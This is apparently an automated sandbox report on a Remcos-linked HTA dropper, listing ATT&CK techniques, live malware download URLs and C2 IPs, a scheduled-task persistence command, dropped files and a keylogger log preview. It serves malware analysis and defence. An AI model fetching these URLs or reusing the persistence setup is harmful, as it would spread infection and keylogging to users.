Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A92263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	38_2_00A92263
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A91C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	38_2_00A91C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	28 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	2 Registry Run Keys / Startup Folder	12 Process Injection	111 Masquerading	LSA Secrets	221 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	2 Valid Accounts	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	121 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\msword\msword.exe	16%	ReversingLabs	Win32.Backdoor.Generic

Source	Detection	Scanner	Label
https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN	100%	Avira URL Cloud	phishing
https://myguyapp.com/W2.pdf8	100%	Avira URL Cloud	phishing
https://myguyapp.com/msword.zi	100%	Avira URL Cloud	phishing
https://myguyapp.com/msword.zip:	100%	Avira URL Cloud	phishing
https://myguyapp.com/msword.zipsH	100%	Avira URL Cloud	phishing
https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERD	100%	Avira URL Cloud	phishing
https://myguyapp.c	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdfl	100%	Avira URL Cloud	phishing
https://myguyapp.com/W2.pdfqH	100%	Avira URL Cloud	phishing
https://candwfarmsllc.com/c2.bat	100%	Avira URL Cloud	malware
https://candwfarmsllc.com	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=h	100%	Avira URL Cloud	phishing
https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLR	100%	Avira URL Cloud	phishing
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN_ROA	100%	Avira URL Cloud	phishing
https://myguyapp.com/mB	100%	Avira URL Cloud	phishing
http://candwfarmsllc.com	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN_ROAMINGP	100%	Avira URL Cloud	phishing
https://myguyapp.com/msword.zipzS	100%	Avira URL Cloud	phishing
https://myguyapp.com/msword.zipi	100%	Avira URL Cloud	phishing
https://myguyapp.com/msword.zipj	100%	Avira URL Cloud	phishing
http://www.microsoft.coa	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSE	100%	Avira URL Cloud	phishing
https://myguyapp.com/W2.pdfxS	100%	Avira URL Cloud	phishing

Name	Source	Malicious	Antivirus Detection	Reputation
https://myguyapp.com/msword.zip	cmd.exe, 00000004.00000003.1703265589.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1680124265.0000000002A2D000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2024952117.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2025460494.0000000002290000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2025541625.0000000002480000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2043113864.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2042155343.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2042892324.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043569674.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043809738.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043942387.0000000003080000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2047509229.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2047279430.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2047975980.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2047866470.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2048091220.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2051819548.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2051485159.0000000000650000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2107238791.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2107396862.0000000003070000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2063550704.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1687520157.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.8.dr	false		high
https://myguyapp.com/msword.zip:	cmd.exe, 0000001E.00000002.2063550704.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN	cmd.exe, 00000004.00000003.2005828687.0000000002A45000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://myguyapp.com/msword.zipsH	extrac32.exe, 00000018.00000002.2051819548.00000000029C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1684264668.0000000004E66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/W2.pdfl	msword.exe, 00000010.00000002.2024952117.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1684264668.0000000004E66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/W2.pdf8	cmd.exe, 0000001E.00000002.2063550704.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.1687520157.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1687520157.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/msword.zi	cmd.exe, 00000004.00000002.2006995200.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2005828687.0000000002A45000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://myguyapp.c	cmd.exe, 00000004.00000003.2005828687.0000000002A45000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2006995200.0000000002A5A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/X	Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000000.2055666013.0000000000AD5000.00000002.00000001.01000000.00000010.sdmp, LinkHub.com, 00000024.00000000.2076341053.0000000000EA5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com, 00000026.00000002.2215592158.0000000000AE5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com.28.dr, Clinton.24.dr	false		high
https://myguyapp.com/W2.pdfqH	extrac32.exe, 00000018.00000002.2051819548.00000000029C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://nsis.sf.net/NSIS_ErrorError	msword.exe, 00000010.00000000.2005722687.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe, 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe.12.dr	false		high
https://www.autoitscript.com/autoit3/	Propose.com, 0000001C.00000003.2062709786.00000000039DC000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr	false		high
https://candwfarmsllc.com/c2.bat	powershell.exe, 00000002.00000002.1680770747.0000000002A30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1682926508.0000000002DB0000.00000004.00000020.00020000.00000000.sdmp, c.hta	true	Avira URL Cloud: malware	unknown
https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERD	tasklist.exe, 00000015.00000002.2047866470.00000000009C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1684264668.0000000004E66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN_ROA	Propose.com, 0000001C.00000003.2062260353.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2063420567.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062013078.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062038789.00000000009F5000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062103447.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2063477046.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062147909.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062060275.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062081491.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2062125358.00000000009F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLR	cmd.exe, 00000004.00000002.2006995200.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://myguyapp.com/msword.zipurl2=h	cmd.exe, 00000004.00000002.2006995200.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2005828687.0000000002A45000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://candwfarmsllc.com	mshta.exe, 00000000.00000002.1696324768.0000000003095000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1684264668.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipzS	choice.exe, 0000001D.00000002.2107238791.0000000002E48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1684264668.0000000004D11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/W2.pdf	powershell.exe, 00000002.00000002.1684264668.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1684264668.00000000050BD000.00000004.00000800.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2024952117.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2025460494.0000000002290000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2025541625.0000000002480000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2043113864.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2042155343.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2042892324.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043569674.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043809738.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043942387.0000000003080000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2047509229.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2047279430.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2047975980.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2047866470.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2048091220.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2051819548.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2051485159.0000000000650000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2107238791.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2107396862.0000000003070000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2063550704.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	false		high
http://candwfarmsllc.com	powershell.exe, 00000002.00000002.1684264668.000000000509C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.1687520157.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1687520157.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/mB	tasklist.exe, 00000013.00000003.2042155343.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2042892324.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2043831819.0000000002DF3000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2043033027.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN_ROAMINGP	cmd.exe, 00000021.00000002.2064562802.0000000002930000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://myguyapp.com/msword.zipj	msword.exe, 00000010.00000002.2024952117.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://myguyapp.com/msword.zipi	tasklist.exe, 00000015.00000003.2047509229.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2047279430.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2048091220.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://myguyapp.com/W2.pdfxS	choice.exe, 0000001D.00000002.2107238791.0000000002E48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1684264668.0000000004D11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSE	cmd.exe, 00000004.00000003.2005828687.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.microsoft.coa	powershell.exe, 00000002.00000002.1680770747.0000000002A6B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
178.237.33.50	unknown	Netherlands		8455	ATOM86-ASATOM86NL	false
193.26.115.39	unknown	Netherlands		46261	QUICKPACKETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589383
Start date and time:	2025-01-12 04:18:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	c.hta
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winHTA@70/102@0/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 91 Number of non-executed functions: 299
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.88.176, 50.16.47.176, 54.224.241.105, 34.237.241.83, 18.213.11.84, 2.16.168.105, 2.16.168.107, 172.64.41.3, 162.159.61.3, 217.20.57.34, 23.209.209.135, 2.22.242.11, 2.22.242.123, 184.26.41.186, 184.26.41.208, 192.168.2.4, 184.28.90.27, 4.245.163.56, 23.56.162.204, 13.107.246.45
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:19:41	Task Scheduler	Run new task: Murray path: wscript s>//B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
03:19:45	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url
22:18:59	API Interceptor	1x Sleep call for process: mshta.exe modified
22:19:00	API Interceptor	101x Sleep call for process: powershell.exe modified
22:19:19	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
22:19:36	API Interceptor	1x Sleep call for process: msword.exe modified
22:20:41	API Interceptor	72x Sleep call for process: Propose.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
178.237.33.50	c2.hta	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	c2.hta	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	I1ahLI8fId.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	yPIOW6yoPi.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	bwYw3UUfy7.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Material Requirments.pif.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	geoplugin.net/json.gp
	preliminary drawing.pif.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	geoplugin.net/json.gp
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
193.26.115.39	c1.hta	Get hash	malicious	Unknown	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	9W9jJCj9EV.bat	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATOM86-ASATOM86NL	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	I1ahLI8fId.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	yPIOW6yoPi.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	bwYw3UUfy7.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Material Requirments.pif.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	preliminary drawing.pif.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
QUICKPACKETUS	c1.hta	Get hash	malicious	Unknown	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	RFQ-20241230.pif.exe	Get hash	malicious	Remcos	Browse	173.211.106.233
	Suppliers_Data.pif.exe	Get hash	malicious	Remcos	Browse	173.211.106.233
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	https://z97f4f2525fyg27.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	172.82.129.154

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	random.exe	Get hash	malicious	LummaC Stealer	Browse
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	3.326674657666219
Encrypted:	false
SSDEEP:	3:rglsPldlnelCl55JWRal2Jl+7R0DAlBG45klovDl6v:MlsPlelCb5YcIeeDAlOWAv
MD5:	613121A2DB138893DC720661DF152F70
SHA1:	E3A10F8E18DD29BF6DB936EC1B0EA1628D49A164
SHA-256:	BE9107929BE5113B680964D41372B133638FF69123B35C2C4A83DED2224ACC4D
SHA-512:	CFD5CE8E30EA51EEBBAF6DA18533D525E8E1B6C363842FFDF1A17D617CC328ECCFDC14441DE3CB4AFBF2033E273AEF7DF8BF4B3398580B4AF835F32D28D6A24A
Malicious:	true
Preview:	....[.2.0.2.5./.0.1./.1.1. .2.2.:.2.0.:.0.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.193934632106187
Encrypted:	false
SSDEEP:	6:iOjucA+q2Pwkn2nKuAl9OmbnIFUtV+sZmwncVkwOwkn2nKuAl9OmbjLJ:7SevYfHAahFUtZ/c5JfHAaSJ
MD5:	A2A874676DFA0B4ABB2F10AF9A835DE9
SHA1:	8F43CC26EDB679DD23F5B82291B4251855F69DB1
SHA-256:	1A86BF970414FEE580BF14F87AE7265003F1C1379FEC8DD2609D92CAC2EB6150
SHA-512:	C4EFB3D49200D02261C73AB8E4C0E1F0D5A49FB495C09D0EB3C936058B197B5521037351F904FE8083C1CC11E098484294EBBC5A8B8DF5862B2DD48874F4A58E
Malicious:	false
Preview:	2025/01/11-22:19:05.878 16a8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/11-22:19:05.880 16a8 Recovering log #3.2025/01/11-22:19:05.881 16a8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.193934632106187
Encrypted:	false
SSDEEP:	6:iOjucA+q2Pwkn2nKuAl9OmbnIFUtV+sZmwncVkwOwkn2nKuAl9OmbjLJ:7SevYfHAahFUtZ/c5JfHAaSJ
MD5:	A2A874676DFA0B4ABB2F10AF9A835DE9
SHA1:	8F43CC26EDB679DD23F5B82291B4251855F69DB1
SHA-256:	1A86BF970414FEE580BF14F87AE7265003F1C1379FEC8DD2609D92CAC2EB6150
SHA-512:	C4EFB3D49200D02261C73AB8E4C0E1F0D5A49FB495C09D0EB3C936058B197B5521037351F904FE8083C1CC11E098484294EBBC5A8B8DF5862B2DD48874F4A58E
